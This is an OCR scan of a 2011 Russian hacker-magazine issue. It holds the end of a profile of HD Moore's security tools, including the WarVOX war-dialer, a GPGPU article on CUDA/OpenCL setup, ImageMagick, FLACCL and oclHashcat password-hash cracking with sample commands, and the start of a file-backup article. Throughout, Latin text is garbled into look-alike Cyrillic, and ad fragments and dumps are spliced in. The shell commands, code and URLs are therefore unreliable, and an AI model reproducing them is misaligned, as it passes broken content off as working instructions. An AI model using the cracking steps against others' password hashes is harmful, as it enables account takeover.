обучения. Но выше уже упоминалось, что «Метасплоит» — не един- 
ственное, что вышло из-под клавиатуры Эйч Ди. Это действительно 
так, хотя остальные его продукты тоже направлены на приносящее 
пользу разрушение :]. 

К примеру, в 2006 году Мур сначала объявил и провел «Месяц 
браузерных багов», в ходе которого публиковал по эксплоиту к 
популярным браузерам каждый день, а затем, подытоживая, выпу- 
стил утилиту АхМап. Программа проводит аудит установленных в 
системе АсйуеХ и формирует список найденных уязвимостей. На 
момент релиза с ее помощью можно было обнаружить практически 
все уязвимости, связанные с этой технологией. 


«Мааз$р]ой Гатем/огк по-прежнему 
бесплатен, хотя и появилась платная 
версия Меазр|ой Ехрге$$, лицензия на 
которую стоит $3000 в год» 


Еще один хороший образчик творчества Мура — \М/аг\ОХ, это не 
что иное, как инструмент для старого доброго \м/аг-Чапа. Она ори- 
ентирована на аудит телефонных линий, способна обнаруживать 
мини-АТС, тональные сигналы готовности, голосовую почту, фак- 
симильные аппараты и другие виды телефонных соединений. С ее 
помощью можно за 8 часов просканировать до 10 000 телефонных 
номеров. \\аг\/ОХ умеет и записывать и архивировать аудиопоток. 
Если на другом конце провода кто-то возьмет трубку, \\Маг\/ОХ это 
обнаружит и начнет запись любого типа аудиосигнала. Прога, 
разумеется, предназначена для исследовательских целей, инвен- 
таризации и проверки безопасности телефонных линий, а не для 
того, о чем ты сейчас подумал. == 
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автомобилей Мины 
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4" = г а % 
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наташа вирий 


а ЗА «ЖиИГИ МАШИНЫНОМЕРА 
>МПН. РУБЛЕЙ ЗА * отм му медик 

М ВЕЕТЕ РЕЪ 
МЕРСЕВЕЗ ВЕН 655 АМБ ПРЛАНГ КК ТОЙОТА ЗОАЯЕЯ 


ОТКРОВЕНИЯ ПИЛОТА «ФОРМУЛЫ 3» 


ЖУРНАЛ ДЛЯ ТЕХ 


| АБА 6ВАМТА СУР — 


О ЗАМЕТЕН В ПОТОКЕ 


СУПЕРКОМПЬЮТЕР 
ИЗ ВИДЕОКАРТЫ 


Задействуем возможности 6РО для ускорения софта 


® Сегодня новости об использовании графических процессоров для 
общих вычислений можно услышать на каждом углу. Такие слова, 
как СОВА, У{геат и ОрепСЕ, за каких-то два года стали чуть ли не 
самыми цитируемыми в айтишном интернете. Однако, что значат 
эти слова, и что несут стоящие за ними технологии, известно дале- 
ко не каждому. А для линуксоидов, привыкших «быть в пролете», 
так и вообще все это видится темным лесом. 


Предисловие Рождение СРСРУ 


В этой статье мы попытаемся разобраться, зачем нужнатехнология Мы все привыкли думать, что единственным компонентом компа, 
СРСРУ (бепега(-ригрозе дгар!с$ ргосез$пд ипК$, Графический про- способным выполнять любой код, который ему прикажут, являет- 
цессор общего назначения] и все связанные сней реализации откон- ся центральный процессор. Долгое время почти все массовые ПК 
кретных производителей. Узнаем, почему эта технология имеет очень оснащались единственным процессором, который занимался всеми 
узкую сферу применения, в которую подавляющее большинство софта мыслимыми расчетами, включая код операционной системы, всего 
не попадает в принципе, и конечно же, попытаемся извлечь из всего нашего софта и вирусов. 

этого выгоду в виде существенных приростов производительности в Позже появились многоядерные процессоры и многопроцессорные 


таких задачах, как шифрование, подбор паролей, работа с мультимедиа системы, в которых таких компонентов было несколько. Это позволило 
и архивирование. машинам выполнять несколько задач одновременно, а общая (теоре- 
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 кегпе1 

мот ВЕЗЕПСгур(__9106а] осбагЯ =" ошЁриё , 
__01оба! исваг4 = 1птри 
__9оба]  исбаг4 = гошп9Кец, 
__9аба! осбаг  * 5Вох г 
_ оса!  шсбагё * Ш осей. 
__1оса|  исбаей = Ыоскт , 
сойЕ{ иле ы ЕВ } 
с0751 итпЕ гоуп05 } 


ист сиаЕ ито Ре оса 0 ма иены 
цз Гог 17 10са1 [9х = 9е_10са1_1908); 
ше Гоги Го Тоса[ Гу = деё_ оса! _ 1901; 


иисеша то отоба| 14 чаше 
ШЗ Гогие Той сТоба! 1 = де _0105а1_1908); 
шт Гоги 17 о оба119у = де _д1оба!_ 1901); 


се а1то Че Боск 14 маие5 
ыпегопе то БТосЕГа = де _дгоор_ 14082; 
ое Гоги гоё БТоскГу = де _дгоир_ 1900}; 
исеша т НОбапое 51205 


итиз ог 17 повапоет2ех = 991910621 _512е(187; 
ип топе 17% паВапое2ец = 0е%_ 9010621512211); 


угас ато БТоск этхе 
ое огеы 10 Тоса1512ех = деё_|06а]_512е18}; 
опе топе то Тоса15Г2еу = де _1оса1_ 612211}: 


ист а то Ве оса ое мае тп Ве БСК 
пе голе го ТосаГобех = Тоба Гу ® (Тоса1 52а»? * оса 9х: 


кс1ИБЕпихНь БА/НЕЗЕпсгир Оесгиур_Кегое 15. с1ИРОТ Гар 95 ВхУЕ 198. 11135 1 


Так выглядит фрагмент реализации алгоритма 
ДЕЗ на ОрепСЕ 


КСРУ или ядро Ипих, уско- 


ренное СРУ 


Исследователи из университета Юты разработали 
систему КСРИ [(соде.дооце.согп/р/карш/), позволяющую 
выполнять некоторые функции ядра ипих на 
графическом процессоре с помощью фреймворка 

СОПЛА. Для выполнения этой задачи используется 
модифицированное ядро Шпих и специальный демон, 
который работает в пространстве пользователя, слушает 
запросы ядра и передает их драйверу видеокарты с 
помощью библиотеки СИПА. Интересно, что несмотря 
на существенный оверхед, который создает такая 
архитектура, авторам КСРИ удалось создать реализацию 
алгоритма АЕ, который поднимает скорость 
шифрования файловой системы еСгур{© в 6 раз. 


тическая} производительность системы поднялась ровно 
во столько раз, сколько ядер было установлено в машине. 
Однако оказалось, что производить и конструировать 
многоядерные процессоры слишком сложно и дорого. В 
каждом ядре приходилось размещать полноценный про- 
цессор сложной и запутанной х86-архитектуры, со своим 
(довольно объемным] кэшем, конвейером инструкций, бло- 
ками 5ЪЕ, множеством блоков, выполняющих оптимиза- 
ции ит.д. ит.п. Поэтому процесс наращивания количества 
ядер существенно затормозился, и белые университетские 
халаты, которым два или четыре ядра было явно мало, 
нашли способ задействовать для своих научных расчетов 
другие вычислительные мощности, которых было в достат- 
ке на видеокарте [в результате даже появился инструмент 
ВгоокСРИ, эмулирующий дополнительный процессор с 
помощью вызовов функций Отес{Х и ОрепбЦ. 
Графические процессоры, лишенные многих недостатков 
центрального процессора, оказались отличной и очень 
быстрой счетной машинкой, и совсем скоро кнаработкам 
ученых умов начали присматриваться сами производители 
СРИ [8 п Фатак и вообще наняла большинство иссле- 
дователей на работу). В результате появилась технология 
пота СОВА, определяющая интерфейс, с помощью кото- 
рого стало возможным перенести вычисление сложных 
алгоритмов на плечи СРИ без каких-либо костылей. Позже 
за ней последовала АТ! (АМО] с собственным вариантом 
технологии под названием С озе {о Мща (ныне ${геап), 


ХАКЕР 08 /151/ 2011 


{ Лаб йо${ х86_64]$ ./В!пагубеагсь 
Ра! Тоге В ; Ндуапсед Мтсго Оеутсе$, Тис. 


боге при 
9811112222222345567080939Ж 19 11 11 11 12 13 13 13 13 13 13 194 15 15 15 1516 17 17 1 1913 
28 21 22 23 23 23 24 24 25 2522727229292 331 31 32 32 33 33 33 33 34 35 35 36 37 38 38 39 39 48 41 
42? 43 43 44 45 45 45 45 46 47 47 48 48 48 493 58 51 52 52 52 52 52 52 52 52 52 52 53 53 593 53 53 54 55 55 55 Я 
6 56 56 57 57 58 59 68 61 61 61 62 63 64 64 64 65 65 65 66 66 67 67 68 69 78 71 71 71 71 72 72 73 73 73 74 75 
76 76 77 78 79 79 ВВ 88 В! 82 83 84 Ва 865 65 86 87 87 87 87 87 88 В9 89 89 98 91 92 93 3934 94 94 934 95 95 96 96 
96 96 97 97 97 38 98 99 99 188 181 181 191 1981 181 182 183 184 184 184 184 1985 196 196 186 196 186 197 188 1а 
В 198 189 118 111 112 112 113 114 115 116 117 118 118 118 119 128 128 128 128 121 121 122 123 123 124 125 126 
126 127 127 128 129 129 129 138 138 138 138 138 138 138 131 131 131 131 132 133 133 134 135 136 136 137 137 13 
В 139 148 141 142 143 144 194 1944 1944 145 196 146 147 147 147 147 147 147 1947 147 147 1947 147 148 149 199 149 
149 158 158 158 158 158 151 151 152 153 153 153 154 155 155 156 157 157 157 157 157 157 157 158 159 159 159 1$ 
Ч 159 159 168 161 162 162 163 163 163 164 164 164 164 165 166 167 168 169 178 171 172 172 173 173 1794 174 174 
174 175 175 176 176 176 176 177 177 177 178 178 179 188 181 1981 182 182 183 184 184 185 186 197 187 188 188 1@ 
Ч 189 198 191 192 192 192 192 193 193 194 195 196 196 196 197 198 199 288 208 281 281 282 282 282 282 283 284 
285 286 286 287 288 288 288 289 289 218 218 218 211 212 213 213 214 215 215 216 217 218 219 228 221 222 223 22 
4 224 225 226 226 226 226 227 227 227 227 228 2729 238 231 232 233 233 233 23а 23а 234 234 235 235 236 237 238 
239 239 248 241 242 242 243 244 244 245 245 245 246 247 247 248 248 249 2493 258 258 258 251 252 253 254 255 25 
6 257 257 258 259 268 268 268 268 268 261 261 262 263 263 263 264 
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бе1есфед Р1а{Тоге Уепдог 
Оеутсе В ; ЯТ|Г В\?18 
Ехеси{ 119 Кегпе|! Фог 1 Цега{ 1071$ 


: Адуапсед Мтсго Оеу!се$, 1пс. 


О ог Везоигсеь! 

бгоир 912е рес! 119 : 256 

Мах бгоур 512е виррог!ед оп {Ве Кегпе] : 128 
СВапа!п9 {Ме дгоишр 512е {0 128 

| = 14, ие 15, 150019 =1, @=5 

| Иабвикос# х86 641$ № 


Тестируем алгоритм двоичного (бинарного} поиска 


а совсем скоро появилась ставшая стандартом версия от 
Арр(е, получившая имя ОрепСЕ(. 


СРУ — наше все? 


Несмотря на все преимущества, техника СРЕРЦ имеетне- 


ео. 


› шЮРЮ 


® Суть технологии 


сколько проблем. Первая из них заключается в оченьузкой 
сфере применения. СРУ шагнули далеко вперед централь- 
ного процессора в плане наращивания вычислительной СРСРУ — произволь- 
мощности и общего количества ядер (видеокарты несутна 


себе вычислительный блок, состоящий из более чем сотни 


ные вычисления на 
видеокартах. 
ядер), однакотакая высокая плотность достигается за счет 
максимального упрощения дизайна самого чипа. ® Существует ОрепС(. 
В сущности основная задача СРЦ сводится к математиче- ОК, разрабатывае- 
ским расчетам с помощью простых алгоритмов, получаю- мый компанией |п{Е|, 
щих на вход не очень большие объемы предсказуемых но пока с его помо- 
данных. По этой причинеядра СРИ имеюточень простой щью можно запускать 
дизайн, мизерные объемы кэша и скромный набор ин- приложения только на 
струкций, что в конечном счете и выливается в дешевизну классическом СРУ. 
их производства и возможность очень плотного размеще- 


ния на чипе. СРУ похожи на китайскую фабрику стысячами  ® ЕАЗТКА | — 


рабочих. Какие-то простые вещи они делают достаточно 
хорошо [а главное — быстро и дешево}, но если доверить 
им сборку самолета, то в результате получится максимум 
дельтаплан. Поэтому первое ограничение СРУ — это 
ориентированность на быстрые математические расчеты, 
что ограничивает сферу применения графических процес- 
соров помощью в работе мультимедийных приложений, а 
также любых программ, занимающихся сложной обработ- 
кой данных (например, архиваторов или систем шифро- 
вания, атакже софтин, занимающихся флуоресцентной 
микроскопией, молекулярной динамикой, электростатикой 
и другими, малоинтересными для линуксоидов вещами). 
Вторая проблема СРСРИ втом, что адаптировать для 
выполнения на СРУ можно далеко не каждый алгоритм. 
Отдельно взятые ядра графического процессора довольно 
медлительны, и их мощь проявляется только при работе 
сообща. А это значит, что алгоритм будетнастолько эффек- 
тивным, насколько эффективно его сможет распаралле- 
лить программист. В большинстве случаев стакой работой 
может справиться только хороший математик, которых 
среди разработчиков софта совсем немного. 

И третье: графические процессоры работают с памятью, 
установленной на самой видеокарте, так что при каждом 
задействовании СРУ будет происходить две дополнитель- 
ных операции копирования: входные данные из опера- 
тивной памяти самого приложения и выходные данные из 
СКАМ обратно в память приложения. Нетрудно догадаться, 
что это может свести на нет весь выигрыш во времени 


суперкомпьютер, 
построенный с ис- 
пользованием 13 ви- 
деокарт, мощностью 
12 ТЕЕОРЪ: Га$га2. 


[НТТР://\М\/ 


р ИпК5 
® 07!р2-сиЧа.д(Виь. 


сот — реализация 
архиватора Б7!р2 

с использованием 
СОВА. 


® Мм. Поорое-соца. 


сот — облачный 
сервис, позволяющий 
загружать и запускать 
софт с поддержкой 
СОВА и ОрепСЕ. 
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Г Пати усы и Лор АМОНАР РОК, 4 | побыфи биг В6_ Вис | гиРо 


Ниабег от ра Гоги: 
Ра Гоги РеоГе: НИ _РВОЕ ТЕ 
Рура Гога Мега ом: Орег С. 1.1 АМЮ-ЯРР-СЕ-у?, 0 1596,18) 
Р] 21 Теги Намне: АМО Восе га 5 Рога 1] Реосеяых г 
Р1 91 Гога Уегиююг: Аереегиыгы] Мрога бест, Те. 
Руа Гоги Еле ое: Е ЕАг 59 21 вн лиги: са СК © авы СИГ гное_ срени 65 
Ра тега Нан: НИО Восе га 68 Рога 1] РГосе3 | Г 
Ниафен” от бели све: Е. 
Печи ое Тре: С _ПЕМГСЕ _ ТУРЕ _ СР 
Пен се 10; дача 
Нах сорте 15, г. 
Мах вюгЕ Гоамх О ынлих | ог: 3 
Мах могЕ Ио [8]: 128 
Мах могЕ 111: 128 
Нах моек вс]: 12 
Мах ыюгК бугор зе: 128 
Ре Тег млосТсг ыы Г Сы НЕ 
РгеТегт 4 мос“ ы Г оке: 


РгеТегт о осо“ ы Ги ПИ: а 
РгеТегте месТо ы фо 1 п: ы 
Ре Тег лес мт 110: й 
РгеТегее ес м1 ме ет Н 
На лие лес м СЕР СИеыг 1 1 
На уе масс мс Ию В 
На ие мес мо 17: Я 


Гы 


Команда с!пю позволит определить, есть ли в системе 
ЭНеат-устройства 


работы приложения (каки происходит в случае с инструментом [(асС(, 
который мы рассмотрим позже). 

Нои этоеще не все. Несмотря на существование общепризнанного 
стандарта влице ОрепСЕ(, многие программисты до сих пор предпо- 
читают использовать привязанные к производителю реализации 
техники СРСРУ. Особенно популярной оказалась СОПА, которая хоть 
и дает более гибкий интерфейс программирования (кстати, ОрепСЁ в 
драйверах п\\ Ча реализован поверх СОА), но намертво привязывает 
приложение к видеокартам одного производителя. 


Что есть сейчас? 


В силу своей молодости, а также благодаря описанным выше про- 
блемам, СРСРОтак и не стала по-настоящему распространенной 
технологией, однако полезный софт, использующий ее возможности, 
существует (хоть и в мизерном количестве). Одними из первых появи- 
лись крэкеры различных хэшей, алгоритмы работы которых оченьлегко 
распараллелить. Также родились мультимедийные приложения, на- 
пример, кодировщик НасСЕ, позволяющий перекодировать звуковую 
дорожку в формат ГАС. Поддержкой СРЕРУ обзавелись и некоторые 
уже существовавшие ранее приложения, самым заметным из которых 
стал падеМад!ск, который теперьумеет перекладывать часть своей 
работы на графический процессор с помощью ОрепСЕ(. Также есть про- 
екты по переводу на СУВА/ОрепС( [не любятюниксоиды АТ] архивато- 
ров данных и других систем сжатия информации. Наиболее интересные 
из этих проектов мы рассмотрим в следующих разделах статьи, а пока 
попробуем разобраться стем, что нам нужно длятого, чтобы все это за- 
велось и стабильно работало. 

Во-первых, понадобится видеокарта, поддерживающая техноло- 
гию СУВА или $(геат. Необязательно, чтобы она былатоповая, 
достаточно только, чтобы год ее выпуска был не менее 2009. Полный 
список поддерживаемых видюшек можно посмотреть в Википедии: 
еп. м/К'ред'а.ога/мАКИСУВА и еп.миК!реЧ'а.ога/\/КУАМО _5{геаг 
Ргосе$5ог. Также о поддержке той или иной технологии можно 
узнать, прочитав документацию, хотя в большинстве случаев будет 
достаточным взглянуть на коробку из под видеокарты или ноутбука, 
обычно на нее наклеены различные рекламные стикеры. 

Во-вторых, в систему должны бытьустановлены последние проприе- 
тарные драйвера для видеокарты, они обеспечат поддержку как родных 
для карточки технологий СРСРУ, так и открытого ОрепС(. 

И в-третьих, так как пока дистрибутивостроители еще не начали рас- 
пространять пакеты приложений с поддержкой СРСРЧУ, нам придется 
собирать приложения самостоятельно, а для этого нужны официальные 
ОК отпроизводителей: СУПА Тос(КИ (900.9 9х] или АТ! 5геат 50К 
(900.9//52К). Они содержат в себе необходимые для сборки приложе- 
ний заголовочные файлы и библиотеки. 


Ставим СОВА ТооКй 


Идем по вышеприведенной ссылке и скачиваем СИПА Тоо{КИ для Чпих 
(выбрать можно из нескольких версий, для дистрибутивов Гедога, 
КНЕС, Убит и 50ЗЕ, есть версии как для архитектуры х86, так и для 
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Аррисайоп 


0Х11 


Сотрще 


ОрепСсЕ 1 Ро[Цгап 


СОВА АгсИКесиге 


пмаа СОВА поддерживает несколько разных реализаций 
СРСРУ 


х86_64]. Крометого, там же надо скачать комплекты драйверов для раз- 
работчиков ([РемеорегОпмег$ Рог Мпих, они идут первыми в списке]. 
Запускаем инсталлятор $0К: 


$ зидо И сидаоо1К1*_4.0.17_11пих_64_ибипи10.109.гип 


Когда установка будет завершена, приступаем кустановке драйверов. 
Для этого завершаем работу Х-сервера: 


# зидо /ефс/1п1.а/ват Фор 


Открываем консоль <С{п+АЦ+Е5> и запускаем инсталлятор драйверов: 


$ зи4о $П аеуаг1уег_4.0_11пих_64_270.41.19.гип 


После окончания установки стартуем иксы: 


$ эфагех 


Чтобы приложения смогли работать с СУБА/ОрепСЕ, прописываем путь 
до каталога с СУПА-библиотеками в переменную [0_ИВКБАКУ_РАТН: 


$ ехрогЕ 1О_ЕТВВАВУ_РАТН=/ич5г/1оса1/сида/11664 


Или, еслиты установил 32-битную версию: 


$ ехрог* 1О_1ТВКАКУ_РАТН=/и$г/1оса1/сида/11632 


Также необходимо прописать путь до заголовочных файлов СОВА, 
чтобы компилятор их нашел на этапе сборки приложения: 


$ ехрог* С_ТМСЬУБЕ_РАТН=/и5г/1оса1/сида/1пс1иае 


Все, теперь можно приступить к сборке СУВА/ОрепС![-софта. 


Ставим АП Зтеат 5О0К 


Згеат ЗОК нетребуетустановки, поэтому скачанный с сайта АМП- 
архив можно просто распаковать в любой каталог (лучшим выбором 
будет/ор{ и прописать путь до него во всю туже переменную О _ 
[|ВБАКУ_РАТН: 


$ иве{ Ир: //г00.51/СМС№ 
$ зидо чаг -х2+ -/АМО-АРР-50К-\2.4-1пх64.+в7 -С /ор* 
$ ехрог* \ 
ЕО_ЕТВКАКУ _РАТН=/ор{/АМО-АРР-50К-\2.4-1пх64/116/х86_64/ 
$ ехрогЕ С_ТМСЕУБЕ_РАТН=/ор{/АМО-АРР-$50К-\2.4-1пх64/1пс1иае/ 


Каки в случае с СУПА Тос(КИ, х86_64 необходимо заменить нах86 в 
32-битных системах. Теперь переходим в корневой каталог и рас- 
паковываем архив 1с9-гед1®{гаНоп.197 [это своего рода бесплатный 
лицензионный ключ]: 
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—)} Чел орнаго гии а сет 


ОСАММ ГОАО 


з-Ьи 64-ЬИ 


Донеииллнет я Но 


Для активизации ОрепСЕ на базе пУаа тебе понадобятся 
СОВА ТооКЯ и драйвера для разработчиков 


$ зидо Фаг -х7+ \ 
/ор*/АМО-АРР-$0К-\2.4-1пх64/1са-геё1${га{1оп.{57 -С / 


Проверяем правильность установки/работы пакета с помощью инстру- 
мента сИп®: 


$ /орЕ/АМО-АРР-$50К-\2.4-1пх64/61п/х86_64/с11пФо 


|падеМасдск и ОрепсЕ 


Поддержка ОрепС( появилась в падеМасдск уже достаточно давно, 
однако по умолчанию она не активирована ни в одном дистрибутиве. 
Поэтому нам придется собрать [М самостоятельно из исходников. 
Ничего сложного в этом нет, все необходимое уже есть в $0К, поэтому 
сборка не потребуетустановки каких-то дополнительных библиотек от 


па или АМО. Итак, скачиваем/распаковываем архив с исходниками: 


$ ибеЕ Ир: //5оо.51/Е6\М\У\ 
$ Еаг -х]+ ТтавеМаё1сКкК-6.7.0-0.Еаг.672 
$ са ТтавеМа21сКк-6.7.0-0 


Далее устанавливаем инструменты сборки: 


$ зидо ар*-ве{ 1п5%а11 Би11а-е55еп1а1 


Запускаем конфигуратор и грепаем его вывод на предмет поддержки 
ОрепСЕ(: 


$ ГОЕЕАб$=-1[$Е0_1ТВВАВУ_РАТН ./сопйвиге | \ 
5гер -е с1.В -е ОрепсЕ 


Правильн ЫЙ результат работы команды должен выглядеть примерно 
так: 


свеск1пя СЁ/с1.П изаб111%у... уе 
спеск1п»ё СЁ/с1.П ргезепсе... уе 
сВеск1пя Фог СЁЕ/с1.П... уе$ 

спеск1п5 ОрепСЕ/с1.П и5аб111%у... по 
спеск1пё ОрепСЕ/с1.П ргезепсе... по 
спеск1па Фог ОрепСЕ/с1.П... по 
спескК1пё ог ОрепСсЕ 116гагу... -1ОрепсЕ 


Словом «уез» должны быть отмечены либо первыетри строки, либо 


вторые (или оба варианта сразу). Если это нетак, значит, скорее всего, 
была неправильно инициализирована переменная С_ИМСЕООЕ_РАТН. 
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—*— Ат 21 [Со 950] 

—^ = РасуоА О.Т --рри-оп № -сри-Игеа д; 3 [СТХ 285] 
—— асс 0.1 [НО 5870] 

—*— СЕ 0.2 5 блм-еры ори Алены 2 [НО 5870] 
—=— ГЕ 0.2 --сри-Вгева 5 2 [СТХ 580] 

=*— РассЕ 0.3 -Казбери [ОТХ 580] 

—=— Г8ЕСЕ 0.3 -сры- Агава 4 [СТХ 580] 


Скорость кодирования НасС( может в десятки раз превос- 
ходить скорость стандартного кодека ас 


Если же словом «по» отмечена последняя строка, значит, дело в пере- 
менной [0_ВКАКУ_РАТН. Если все окей, запускаем процесс сборки/ 
установки: 


$ зиао маке 1п$%а11 с1еап 


Проверяем, что гпадеМадск действительно был скомпилирован с под- 
держкой ОрепСГ: 


$ /изг/1оса1/61п/сопуег* -мег$1оп | вгер Ееафиге$ 
Ееафиге$: ОрепМР Орепсе 


Теперь измерим полученный выигрыш в скорости. Разработчики 
|падеМадск рекомендуют использовать для этого фильтр сопуо\е: 


$ Е1те /изг/Ь1п/сопуег* 1таве. ря -сопуо]1уе \ 
'-1, -1, -1, -1, 9, 
$ Е1те /и5г/1оса1/61п/сопуег* 1тазе. ре -сопуо1муе \ 
1, 1-9. 


-1, -1, -1, -1' 1таве2.)рё 
-1, -1, -1, -1' 1таве2.)рё 


Некоторые другие операции, такие как ресайз, теперьтоже должны ра- 
ботать значительно быстрее, однако надеяться нато, что [падеМасдиск 
начнет обрабатывать графику с бешеной скоростью, не стоит. Пока еще 
очень малая часть пакета оптимизирована с помощью ОрепСЕ. 


Насс (Насида) 


НасСЕ (млм. сие{оо($.пеУдоки.рпр/асида) — это кодировщик звуковых 
файлов в формат Е ГАС, задействующий в своей работе возможности 


ОрепС(. Он входитв состав пакета СУЕТоо($ (Млллм. сиетоо[$.пе/докч. 
ово} для М/пао\/, но благодаря ппопо может быть использован ив Мпих. 
Для получения архива с кодировщиком выполняем следующую коман- 


ду: 


$ шКа1г Яасс1 && са Яасс1 
$ ивеЕ имм. сие оо1$ .пе{/1п${а11/Яасс1@3 .гаг 


Далее устанавливаем чпгаг, топо и распаковываем архив: 


$ зидо ар*-ве{ 1п5%а11 ипгаг топо 
$ ипгаг х Яасс1 63. гаг 


Чтобы программа смогла найти библиотеку ОрепС(., делаем символи- 
ческую ссылку: 


$ 1п -5 $10_11ВВАВУ_РАТН/11БОрепСЕ . зо 11Борепс1. 50 
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СРУ уже давно обогнали х86-процессоры в производительности 


Теперь запускаем кодировщик: 


$ топо СУИЕТоо1$ .ЕЕАССЕ. ста.ехе ти$1с .ма\у 


Если на экран будет выведено сообщение об ошибке «Еггог: Кедие$еа 
согпрце °1те 15 Бадег{ап {Пе гедигеа ммогКдгоир э1т7е о! 32», значит, у 
нас в системе слишком слабенькая видеокарта, и количество задей- 
ствованных ядер следует сократить до указанного числа с помощью 
флага --дгоир-5хе ХХ’, где ХХ — нужное количество ядер. 

Сразу скажу, из-за долгого времени инициализации ОрепСЕ заметный 
выигрыш можно получить только на достаточно длинных дорожках. Ко- 
роткие звуковые файлы асС( обрабатывает почти стой же скоростью, 
что и его традиционная версия. 


|Назпса! 0 - 
а С. или брутфорс по 


Какя уже говорил, одними из первых поддержку СРСРЦ в свои про- 
дукты добавили разработчики различных крэкеров и систем брутфорса 
паролей. Для них новая технология стала настоящим святым граалем, 
который позволил с легкостью перенести отприроды легко распарал- 
леливаемый код на плечи быстрых СРУ-процессоров. Поэтому неуди- 
вительно, что сейчас существуют десятки самых разных реализаций 
подобных программ. Но в этой статье я расскажу только об одной изних 
— ос{Назйса\. 

ос[НазНса\ (Вазбса.пе/ос!фазвса\/) — это ломалка, которая умеет 
подбирать пароли по иххэшу с экстремально высокой скоростью, 
задействуя при этом мощности СРУ с помощью ОрепСЕ. Если верить 
замерам, опубликованным на сайте проекта, скорость подбора МО>З- 
паролей на п\У@!а СТХЪ80 составляет до 15800 млн комбинаций в секун- 
ду, благодаря чему ос НазВса{ способен найти средний по сложности 
восьмисимвольный пароль за какие-то 9 минут. 

Программа поддерживает ОрепСЕ и СОВА, алгоритмы МОЪ, 
па5[Фраз$.$зай), 95 [п1а5(Фраз$]), УВиЦейп < \3.8.5, $НАТ, 


эВа1 ($раз$.$за{), хэши Му5@(, МО4, МТЕМ, Богат Саспед Сгедепна($, 


$НА256, поддерживает распределенный подбор паролей с задейство- 
ванием мощности нескольких машин. 
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Автор не раскрывает исходники [что, в общем-то, логично}, ноу про- 
граммы есть нормально работающая Ипих-версия, которую можно по- 
лучить на официальной страничке: Васа. пе/е5/осНазВса{-0.25.72. 
Далее следует распаковать архив: 


$ 72 х ос1НазИса*-0.25.72 
$ са ос1На$Иса*-0.25 


И запустить программу (воспользуемся пробным списком хэшейи 
пробным словарем]: 


$ ./ос1НазНсае64.61п ехатр1е.Назй ?1?1?1?1 \ 
ехатр1е.41с* 


ос{НазПса{ откроеттекст пользовательского соглашения, с которым 
следует согласиться, набрав «УЕ$». После этого начнется процесс 
перебора, прогресс которого можно узнать по нажатию <$>. Чтобы 
приостановить процесс, кнопаем <р>, для возобновления — <г>. 
Также можно использовать прямой перебор (например, отаааааааа до 
77777777]: 


$ ./ос1НазНсае6А.Блп Базб. хе 21212121 \ 
1 


И различные модификации словаря и метода прямого перебора, атак- 
же их комбинации [об этом можно прочитать в файле дос$/ехатр(е$.1х. 
В моем случае скорость перебора всего словаря составила 11 минут, 
тогда как прямой перебор [отаааааааа до 7277277272] длился около 40 ми- 
нут. В среднем скорость работы 6РУ [чип К\710] составила 88,3 млн/с. 


Выводы 


Несмотря на множество самых разных ограничений и сложность разра- 
ботки софта, СРСРУ — будущее высокопроизводительных настольных 
компов. Но самое главное — использовать возможности этой техноло- 
гии можно прямо сейчас, и это касается нетолько \\Лп9о\м/5-машин, но 

и Ипих. 2= 
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Реклама 


мо 


Наконетии 
не стыли 


РАЮ 2 САТАХУ 4 


ТРНОМЕ 4 ТУСАЕОТВЕЕ З 


ЕРЩЕНСТВО 4 


ЗЕМЛЯ 


| 


м м Евгений Зобнин (ехесЬЁ.ги) 


ФАИЛОВ 


1000 и один способ откатить 
и синхронизировать файлы 


ПОВЕЛИТЕЛЬ 


® Случайно затертые или замененные файлы — бич абсолютно всех 
пользователей [/пих. Любой из нас хоть раз в жизни лишался важ- 
ных данных из-за банальной халатности: одна команда — и дан- 
ные, над которым работал многие дни и недели, исчезает в одно 
мгновение. И в большинстве случаев их уже не вернуть. В этой ста- 
тье я расскажу, как избежать таких ситуаций. 


Введение впроблему 

В каких случаях мы обычнотеряем файлы? Я бы выделил два наиболее 
популярных сценария: 

1. «Что это за старое файло? В мусорку!». Зачастую мы удаляем важные 
файлы просто по ошибке, или думая, что они уже не содержат важной 
для нас информации. Это стандартный сценарий, знакомый всем. 

2. «Щася исправлю этот файл, ита штука заработает быстрее». Более 
сложный вариант, при котором человек хочет сделать лучше, но по- 
лучаетхудший вариант, а когда пытается вернуть все на место, уже точно 
не помнит, что содержал файл изначально. Это типичная проблема 
кодеров, сисадминов, веб-дизайнеров и просто экспериментаторов. И 
одна из причин появления систем контроля версий. 

Как избежатьтаких ситуаций? Очень просто: не попадать в них. Аесли 
серьезно, то нам нужна какая-то система, которая бы помнила содер- 
жимое всех наших файлов и хранила бы их прошлые версии [включая 
те, оригиналы которых были удалены). Тогдавлюбой моментвремени 
мы сможем вернуть все на место без потерь. Еще лучше, если система 


предоставит способ синхронизировать этот архив на удаленную машину, 


чтобы данные остались с нами даже в случае тотального краха всего и 
ВСЯ, 


Простейшая система отката 


Не заморачиваясь счем-то более сложным и требующем настройки, 
попробуем представить себе, как может выглядеть простейшая система 
отката файлов кпредыдущим версиям. Скорее вееГо, это будет нечто 
вроде этого: 
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// Хммм, я хочу отредактировать файл сопйЯ. с+=, но не хочу 
его потерять 

$ ср сопйв. с+в сопйя. св .БакК 

// Окей, теперь можно редактировать 

$ м1 сопйя. св 

// Бррр, теперь ничего не работает, придется вернуть оригинал 
$ ши сопйв. с+е.БакК сопйя. св 


Готов поспорить, что хоть раз в жизни тытак делал. Я тоже. И это хорошо, 
однако вводить лишние команды перед каждым редактированием 
файла оказывается не очень-то удобно. Со временем начинаешь просто 
забивать на резервные копии. 

Мы можем развить идею и написать функцию, которая будет делать 
бэкап автоматически, прямо во время открытия файла на редактирова- 
ние. Также можно написать функцию, которая вернет файл из бэкапа. 
Выглядеть они могуттак: 


У1и() { 
РТЕЕ=$1 
ОАТЕ=` 4афе +'#Е '` 
ВАК=.ФЕТЕЕ .БакК 
ср ФЕТЬЕ $ВАК-$ФБАТЕ 
ги -Р $ВАК 
]1п -$ $ВАК-БАТЕ $ВАК 
\1т ФЕТЁЕЕ 
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Ежей Коо! 


Роимег Роимет 


Ежей! Тгее 


Воск аПосапой 


шГогтанцой ап 


Ке[егепсе Соци$ 


Зибуоште '4еГаш! 


НАМЕ 
ЬЁгТ5 - сопго] а Б4гР5 ГИ езузфет 


5\НОР515 
БфгРз зыбуо]ите эпарзбоф %зоигсе» [5дезф»/ ]<пате» 


Б-Р эибуоите Фе]ефе <зыбуоите» 
Ь\гР5 эибуоите сгеафе [%9е515>/]<пате>» 
БфгТз зибуо те 115% храЁН> 


Бгт5 зибуо|ите зефт-ОеГгаи]1Т <19> <райН> 


